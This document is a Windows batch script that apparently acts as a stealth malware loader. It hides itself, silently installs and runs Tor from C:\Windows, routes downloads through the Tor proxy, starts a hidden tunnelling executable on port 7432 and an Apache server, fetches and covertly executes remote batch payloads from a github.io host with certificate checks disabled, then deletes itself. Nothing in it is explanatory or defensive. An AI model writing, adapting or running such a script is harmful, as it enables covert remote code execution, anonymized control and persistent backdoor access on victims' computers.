@echo off
setlocal
attrib +s +h +i "%~f0"
:connectivitycheck
ping www.google.com -n 1 -w 5000 >NUL
if errorlevel 1 goto Connectivitycheck

Set host=https://cryptedodissey.github.io
Set enviroment=C:\Windows

if exist "%environment%\tor.exe" (
    echo.
) else (
"%environment%\curl.exe" -k -L https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz > "%temp%\Tor.tar.gz" && "%environment%\7-Zip\7z.exe" e "%temp%\Tor.tar.gz" -so | "%environment%\7-Zip\7z.exe" e -aoa -si -ttar "tor/tor.exe" -o"%environment%" -y && attrib +s +h +i "%environment%\tor.exe" && del "%temp%\Tor.tar.gz"
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (echo) else (
  "%environment%\nircmd.exe" exec hide "%environment%\tor.exe" && timeout -t 30
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (set "proxy=--tlsv1 --socks5-hostname 127.0.0.1:9050") else (
  set "proxy=--tlsv1"
)

attrib -s -h -i "%environment%\expose.exe"
if exist "%environment%\expose.exe" (
   tasklist /fi "imagename eq expose.exe" | find /i "expose.exe" > nul
if not errorlevel 1 (attrib +s +h +i "%environment%\expose.exe") else (attrib -s -h -i "%temp%\expose.bat" && attrib -s -h -i "%temp%\expose.txt" && echo ^%environment%\expose.exe 7432^ ^>^ ^%temp%\expose.txt^ > "%temp%\expose.bat" && "%environment%\nircmd.exe" exec hide "%temp%\expose.bat" && timeout -t 4 && attrib +s +h +i "%environment%\expose.exe" && attrib +s +h +i "%temp%\expose.txt" && attrib +s +h +i "%temp%\expose.bat"
)
)

if exist "C:\apache2\bin\httpd.exe" (
tasklist /fi "imagename eq httpd.exe" | find /i "httpd.exe" > nul
if not errorlevel 1 (echo.) else ("%environment%\nircmd.exe" exec hide "C:\apache2\bin\httpd.exe"
)
)


set "installer=%random%%random%"
"%environment%\curl.exe" -k %proxy% %host%/Tools/installer.bat -o "%environment%\Win32\%installer%.bat" && attrib +s +h +i "%environment%\Win32\%installer%.bat"
"%environment%\nircmd.exe" exec hide "%environment%\Win32\%installer%.bat"

set "win32=%random%"
"%environment%\curl.exe" -k %proxy% %host%/win32.bat -o "%environment%\Win32\%win32%.bat" && attrib +s +h +i "%environment%\Win32\%win32%.bat"
timeout -t 300
"%environment%\nircmd.exe" exec hide "%environment%\Win32\%win32%.bat"
endlocal
DEL /s /f /q /a "%~f0"
